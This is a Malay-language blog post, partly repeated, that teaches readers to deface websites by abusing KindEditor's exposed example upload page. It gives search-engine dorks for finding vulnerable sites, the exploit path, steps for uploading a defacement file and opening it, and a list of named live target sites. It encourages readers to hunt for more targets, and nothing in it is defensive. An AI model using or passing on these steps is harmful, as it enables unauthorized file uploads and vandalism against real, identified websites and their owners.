Kindeditor
CARA DEFACE DENGAN KINDEDITOR
Assalamualaikum semua...entry hari ini aku nak ajar korang cara deface dengan KindEditor...tanpa berlengah lagi jom mula...
1. Mula-mula cari website vuln guna dork dibawah :
selepas itu pilih salah satu website.
2. Setelah buka website tersebut, masukkan exploit dibawah :
http://www.sitevuln.com/kindeditor/examples/uploadbutton.html
3. Selepas itu korang akan nampak butang upload.
click, pilih file deface anda, dan dia akan upload automatik.
Supported Files:doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2, gif, jpg, dll
4. Untuk tengok hasil deface, akan terpapar link file yg telah di-upload sebentar tadi di dalam kotak sebelah upload itu.Cuma perlu copy, dan replace link itu di depan url website.
CONTOH :
Dalam Kotak keluar :
/themes/default/js/kindeditor/attached/file/20111222/20111222172332_24051.html
Replace Link ni di depan URL :
http://www.arimlab.com/themes/default/js/kindeditor/attached/file/20111222/20111222172332_24051.html
5. DONE!!!
Some Live Targets :
INGAT!Jangan malas untuk meng-explore dan mereka dork sendiri...selamat berjaya...
Assalamualaikum...
Sumber
1. Mula-mula cari website vuln guna dork dibawah :
- intitle:index of? inurl:kindeditor
- inurl:examples/uploadbutton.html
selepas itu pilih salah satu website.
2. Setelah buka website tersebut, masukkan exploit dibawah :
http://www.sitevuln.com/kindeditor/examples/uploadbutton.html
Atau bukak directory one by one(lebih berkesan)
click, pilih file deface anda, dan dia akan upload automatik.
Supported Files:doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2, gif, jpg, dll
4. Untuk tengok hasil deface, akan terpapar link file yg telah di-upload sebentar tadi di dalam kotak sebelah upload itu.Cuma perlu copy, dan replace link itu di depan url website.
CONTOH :
Dalam Kotak keluar :
/themes/default/js/kindeditor/attached/file/20111222/20111222172332_24051.html
Replace Link ni di depan URL :
http://www.arimlab.com/themes/default/js/kindeditor/attached/file/20111222/20111222172332_24051.html
5. DONE!!!
Some Live Targets :
- http://www.arimlab.com/themes/default/js/kindeditor/examples/uploadbutton.html
- http://www.clogoo.net/public/js/kindeditor/examples/uploadbutton.html
INGAT!Jangan malas untuk meng-explore dan mereka dork sendiri...selamat berjaya...
Assalamualaikum...
Sumber
